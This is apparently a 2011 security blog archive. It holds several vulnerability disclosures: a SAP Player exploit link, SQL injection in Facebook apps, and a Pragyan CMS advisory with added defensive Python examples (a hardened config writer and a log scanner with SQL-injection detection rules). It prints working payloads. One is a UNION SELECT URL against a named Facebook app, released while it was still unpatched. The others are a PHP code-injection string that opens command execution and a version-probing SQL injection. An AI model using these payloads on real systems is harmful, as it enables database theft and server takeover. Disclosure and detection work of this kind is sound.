Tuesday, July 5, 2011

SAP Player 0.9 (.m3u) universal

This exploit uses a direct return address; it is not the SEH version.


http://packetstormsecurity.org/files/view/102792/sapplayer-overflow.py.txt

Monday, March 21, 2011

Another vulnerability in facebook apps!

This is the second SQL injection we found in Facebook apps.

We tried to contact developers but got no response from them. So we decided to release the vulnerability.

Note:: There are a few more Facebook apps which we found to be vulnerable to SQL injection attacks. We are waiting for the developers to patch those. We will post them as soon as they are patched.

A Proof Of Concept of the vulnerability can be seen at::

http://apps.facebook.com/lucygames/game.php?gameid=-123%20UNION%20SELECT%20null,%28select%20concat%280x3a,unhex%28Hex%28cast%28group_concat%28table_name%29%20as%20char%29%29%29,0x3a%29%20FROM%20information_schema.tables%20Where%20table_schema=0x6C75637967616D6573%29,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--

Wednesday, March 9, 2011

SQL Injection in Facebook applications!

We found a vulnerability in 2 Facebook applications. One is patched now, so we are disclosing the vulnerability.


There was a SQL injection vulnerability in apps.facebook.com.

Vendor::twmarketplace
Location:: http://apps.facebook.com/twmarketplace/post.php?postid=
Severity:: Critical
Impact:: Database access/server control


It was possible to extract all data of all databases located on that server.


Changelog::
7/3/2010 - Facebook vendors notified
8/3/2010 - Response from vendor
8/3/2010 - Vendor patched the vulnerability
9/3/2010 - Public disclosure

Saturday, February 26, 2011

Pragyan CMS v3.0 multiple vulnerabilities!

During Pragyan's hacking challenge we found these vulnerabilities in their open-source CMS.


#Pragyan CMS v3.0 multiple vulnerabilities


#Author Villy and Abhishek Lyall - villys777[at]gmail[dot]com,

abhilyall[at]gmail[dot]com

#Web - http://www.aslitsecurity.com/

#Blog - http://bugix-security.blogspot.com

#http://www.aslitsecurity.blogspot.com/

#Pragyan CMS v 3.0



Technical Description





1) Code execution in INSTALL/install.php

The script does not correctly validate the entered fields.

It is possible to write the following string into the password field:



");echo exec($_GET["a"]);echo ("



or into other fields with JavaScript turned off.

cms/config.inc.php will then contain the following code:

define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");

which allows command execution.



EXPLOIT:: http://target.com/blog/cms/config.inc.php?a=ls -la
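The root cause described above is an installer that pastes a submitted field straight into a double-quoted PHP `define()`, so a quote in the value terminates the string and everything after it is parsed as code. The example below is added here and is not Pragyan's code: it reproduces that insecure generator in Python beside a hardened one that allowlists the constant name and emits a properly escaped single-quoted PHP literal, and includes a small statement counter (a hypothetical helper, not a PHP parser) that shows the payload from this advisory adds two extra statements to the vulnerable output and none to the hardened one.

```python
import re

# The password-field payload quoted in this advisory.
ADVISORY_PAYLOAD = '");echo exec($_GET["a"]);echo ("'


def render_config_vulnerable(fields: dict) -> str:
    """Insecure pattern: the raw value is dropped into a double-quoted define()."""
    return "\n".join(f'define("{key}","{value}");' for key, value in fields.items())


def php_string_literal(value: str) -> str:
    """Emit a single-quoted PHP string literal.

    In single-quoted PHP strings only backslash and the quote itself are
    special, so escaping those two characters keeps any value inside the string.
    """
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def render_config_hardened(fields: dict) -> str:
    """Hardened generator: allowlisted constant names, escaped string values."""
    lines = []
    for key, value in fields.items():
        # Constant names come from the installer itself, so they must be plain identifiers.
        if not re.fullmatch(r"[A-Z][A-Z0-9_]*", key):
            raise ValueError(f"refusing to write config key {key!r}")
        lines.append(f"define({php_string_literal(key)}, {php_string_literal(value)});")
    return "\n".join(lines)


def top_level_statements(php: str) -> int:
    """Count ';' outside string literals (hypothetical helper, not a full PHP lexer).

    A config file written by the installer should contain exactly one statement
    per define(); any surplus means a value broke out of its string.
    """
    count, quote, i = 0, None, 0
    while i < len(php):
        c = php[i]
        if quote:
            if c == "\\":          # skip the escaped character
                i += 2
                continue
            if c == quote:
                quote = None
        elif c in ("'", '"'):
            quote = c
        elif c == ";":
            count += 1
        i += 1
    return count


if __name__ == "__main__":
    fields = {"MYSQL_PASSWORD": ADVISORY_PAYLOAD}
    for name, render in (("vulnerable", render_config_vulnerable),
                         ("hardened", render_config_hardened)):
        out = render(fields)
        print(f"{name}: {top_level_statements(out)} statement(s)\n  {out}")
```

The vulnerable renderer reproduces the exact `define("MYSQL_PASSWORD","");echo exec(...)` line shown in the advisory; the hardened one keeps the same payload inert because the only way out of a single-quoted PHP string is an unescaped quote, which the literal builder never emits. Rejecting unexpected constant names closes the same hole on the key side.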



2) SQL injection

- get MySQL version EXPLOIT::

http://target.com/path/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,concat(unhex(Hex(cast(@@version as char)))),null,null,null--
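Both the Facebook application posts above and this Pragyan CMS item rely on the same UNION-based technique: a negative id, a `UNION [ALL] SELECT` padded with `null` columns, a probe of `@@version` or `information_schema`, a hex literal, and a trailing `--`. The following example is added here and is not from the advisory or any of the projects it names: it scans Apache-style access-log lines for that signature so an operator can spot such requests after the fact. The log lines are constructed for the example, and the rule names and thresholds are the author's own assumptions.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (common log format) modelled on the request
# shapes in the posts above; these are not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Mar/2011:10:00:01 +0000] "GET /lucygames/game.php?gameid=42 HTTP/1.1" 200 5120
10.0.0.9 - - [09/Mar/2011:10:00:07 +0000] "GET /lucygames/game.php?gameid=-123%20UNION%20SELECT%20null,%28select%20group_concat%28table_name%29%20FROM%20information_schema.tables%20Where%20table_schema=0x746573745f6462%29,null-- HTTP/1.1" 200 7310
10.0.0.9 - - [09/Mar/2011:10:00:12 +0000] "GET /blog/+view&thread_id=-1%20UNION%20ALL%20SELECT%20null,concat%28unhex%28Hex%28cast%28@@version%20as%20char%29%29%29%29,null-- HTTP/1.1" 200 880
10.0.0.7 - - [09/Mar/2011:10:00:20 +0000] "GET /blog/+view&thread_id=17 HTTP/1.1" 200 4400
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed rule set: each name is a constructed label, each pattern targets one
# component of the UNION-based payloads shown in the posts.
RULES = [
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("schema_enum", re.compile(r"information_schema\.", re.I)),
    ("version_probe", re.compile(r"@@version\b", re.I)),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{6,}\b", re.I)),
    ("comment_tail", re.compile(r"(?:--|#|/\*)\s*$")),
]


def normalize(target: str) -> str:
    """Percent-decode twice (double encoding is common), map '+' to space, collapse whitespace."""
    decoded = unquote(unquote(target)).replace("+", " ")
    return re.sub(r"\s+", " ", decoded).strip()


def scan_line(line: str):
    """Return a finding dict for a suspicious request line, or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    norm = normalize(target)
    hits = [name for name, rx in RULES if rx.search(norm)]
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "path": unquote(target.partition("?")[0]),
        "rules": hits,
    }


def scan_log(text: str) -> list:
    """Scan every line of a log and collect the findings in order."""
    return [r for r in (scan_line(line) for line in text.splitlines()) if r]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['time']} {finding['ip']} {finding['path']} -> {', '.join(finding['rules'])}")
```

Decoding before matching matters: the payloads in the posts are percent-encoded in the URL, and a rule written against the raw request line would miss `%20UNION%20SELECT`. Matching on several independent components and reporting which ones fired also makes it easy to separate a real enumeration attempt (several rules at once) from a lone false positive such as a legitimate comment in a search field.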



Solution

Update to Pragyan CMS 3.0 rev. 274.



Changelog

2011-19-02 : Initial release

2011-20-02 : Reported to vendor

2011-25-02 : patch released

2011-25-02 : public disclosure



Credits

Villy

Abhishek Lyall

pragyan.org

http://bugix-security.blogspot.com

http://www.aslitsecurity.blogspot.com/





Abhishek Lyall